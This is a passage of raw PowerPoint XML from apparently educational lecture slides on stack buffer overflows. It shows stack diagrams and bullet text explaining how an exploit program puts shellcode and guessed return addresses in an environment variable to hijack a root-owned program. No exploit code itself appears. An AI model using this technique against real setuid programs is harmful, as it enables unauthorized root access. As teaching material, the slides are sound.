              <a:t>	will write the address of the shellcode to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0"/>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t> in the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16387" name="Group 18"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6303962" y="1371600"/>
            <a:ext cx="2403475" cy="2286000"/>
            <a:chOff x="3792" y="816"/>
            <a:chExt cx="1285" cy="746"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16389" name="Rectangle 8"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4032" y="1298"/>
              <a:ext cx="720" cy="264"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFCC00"/>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b="1" dirty="0"/>
                <a:t>ret</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16390" name="Rectangle 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4032" y="1036"/>
              <a:ext cx="720" cy="262"/>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sfp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16391" name="Rectangle 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4032" y="816"/>
              <a:ext cx="720" cy="263"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0099FF"/>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*ret (var)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16392" name="Freeform 13"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3792" y="965"/>
              <a:ext cx="193" cy="373"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 250"/>
                <a:gd name="T1" fmla="*/ 0 h 1056"/>
                <a:gd name="T2" fmla="*/ 0 w 250"/>
                <a:gd name="T3" fmla="*/ 1 h 1056"/>
                <a:gd name="T4" fmla="*/ 2 w 250"/>
                <a:gd name="T5" fmla="*/ 1 h 1056"/>
                <a:gd name="T6" fmla="*/ 2 w 250"/>
                <a:gd name="T7" fmla="*/ 1 h 1056"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 60000 65536"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 w 250"/>
                <a:gd name="T13" fmla="*/ 0 h 1056"/>
                <a:gd name="T14" fmla="*/ 250 w 250"/>
                <a:gd name="T15" fmla="*/ 1056 h 1056"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T8">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T9">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T10">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T12" t="T13" r="T14" b="T15"/>
              <a:pathLst>
                <a:path w="250" h="1056">
                  <a:moveTo>
                    <a:pt x="249" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="5"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="1056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250" y="1056"/>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393" name="Text Box 14"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4742" y="841"/>
              <a:ext cx="332"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1200"/>
                <a:t>4 bytes</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16394" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4745" y="1123"/>
              <a:ext cx="332"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1200"/>
                <a:t>4 bytes</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16388"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B79F7654-D85B-44E0-9193-E359EAA8B6E0}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"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DE1A005D-97D0-4B9D-87B1-D8874AD18FB9}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>Writing an Exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17412" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1524000"/>
            <a:ext cx="7772400" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>Suppose we want to “overflow” this program, which is owned by root.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>The hacker creates an exploit program to put the overflow string in an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>environment variable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>The environment variables are stored near the stack when the vulnerable program is executed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>The exploit program takes a buffer size and an offset as parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Guess the position of the buffer we want to overflow.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="17413" name="Object 4">
            <a:hlinkClick r:id="" action="ppaction://ole?verb=1"/>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3287310307"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4953000" y="2209800"/>
          <a:ext cx="914400" cy="714375"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s17465" name="Wordpad Document" showAsIcon="1" r:id="rId4" imgW="914400" imgH="714240" progId="WordPad.Document.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Wordpad Document" showAsIcon="1" r:id="rId4" imgW="914400" imgH="714240" progId="WordPad.Document.1">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="Object 4"/>
                      <p:cNvPicPr>
                        <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                      </p:cNvPicPr>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId5"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr bwMode="auto">
                      <a:xfrm>
                        <a:off x="4953000" y="2209800"/>
                        <a:ext cx="914400"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78CCA3FF-7942-4ED5-BBB1-A61062280142}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46082" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>Exploit2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="18436" name="Object 3">
            <a:hlinkClick r:id="" action="ppaction://ole?verb=1"/>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2664433756"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="611188" y="3213100"/>
          <a:ext cx="2643187" cy="2303463"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s18503" name="Wordpad Document" showAsIcon="1" r:id="rId4" imgW="914400" imgH="714240" progId="WordPad.Document.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Wordpad Document" showAsIcon="1" r:id="rId4" imgW="914400" imgH="714240" progId="WordPad.Document.1">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="Object 3"/>
                      <p:cNvPicPr>
                        <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                      </p:cNvPicPr>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId5"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr bwMode="auto">
                      <a:xfrm>
                        <a:off x="611188" y="3213100"/>
                        <a:ext cx="2643187" cy="2303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8437" name="Group 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3886200" y="1821443"/>
            <a:ext cx="2484438" cy="4824413"/>
            <a:chOff x="3856" y="1162"/>
            <a:chExt cx="1565" cy="3039"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18438" name="Rectangle 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3856" y="1707"/>
              <a:ext cx="862" cy="1362"/>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dirty="0">
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Overflowed</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>buffer</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18439" name="Rectangle 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3856" y="3068"/>
              <a:ext cx="862" cy="272"/>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sfp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18440" name="Rectangle 7"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3856" y="3340"/>
              <a:ext cx="862" cy="272"/>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dirty="0">
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>ret</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18441" name="Rectangle 8"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4604" y="2251"/>
              <a:ext cx="635" cy="27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addr</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18442" name="Rectangle 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4604" y="1706"/>
              <a:ext cx="635" cy="5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dirty="0">
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>shellcode</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18443" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4739" y="1464"/>
              <a:ext cx="4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1800">
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>$EGG</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18444" name="Line 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000">
              <a:off x="5239" y="3475"/>
              <a:ext cx="18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5" name="Line 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="5420" y="1706"/>
              <a:ext cx="0" cy="177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6" name="Line 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="5239" y="1706"/>
              <a:ext cx="182"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8447" name="Text Box 14"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4013" y="3741"/>
              <a:ext cx="545"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50000"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1400">
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Higher memory address</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18448" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3968" y="1162"/>
              <a:ext cx="545"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50000"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1400">
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Lower memory address</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18449" name="Rectangle 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4604" y="2522"/>
              <a:ext cx="635" cy="27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addr</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18450" name="Rectangle 17"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4604" y="2794"/>
              <a:ext cx="635" cy="27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addr</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18451" name="Rectangle 18"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4604" y="3067"/>
              <a:ext cx="635" cy="27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addr</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18452" name="Rectangle 19"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4604" y="3339"/>
              <a:ext cx="635" cy="27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addr</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258886" y="1469871"/>
            <a:ext cx="2362200" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-HK" dirty="0"/>
              <a:t>Stack diagram for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" dirty="0" err="1"/>
              <a:t>vulnerable.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Straight Arrow Connector 3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3392486" y="2300868"/>
            <a:ext cx="384178" cy="38417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5830886" y="974145"/>
            <a:ext cx="2362200" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-HK" dirty="0"/>
              <a:t>Generated by exploit2.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Arrow Connector 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5830886" y="1903627"/>
            <a:ext cx="538163" cy="3940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6732586" y="4261768"/>
            <a:ext cx="2209800" cy="1631216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-HK" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" sz="2000" dirty="0"/>
              <a:t> tries to point to the beginning of the shellcode (the chance is very low though)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6442075" y="4412243"/>
            <a:ext cx="214311" cy="21669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278040" y="5407774"/>
            <a:ext cx="3282723" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>In exploit2.c, the meaning of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>(0) before the shellcode will be explained later</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80846CEA-D80C-41D8-BADF-4D6EADC83FD3}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4098" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3076" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1524000"/>
            <a:ext cx="7772400" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>When a program is executed, the system maintains an </a:t>
            </a:r>
            <a:r>
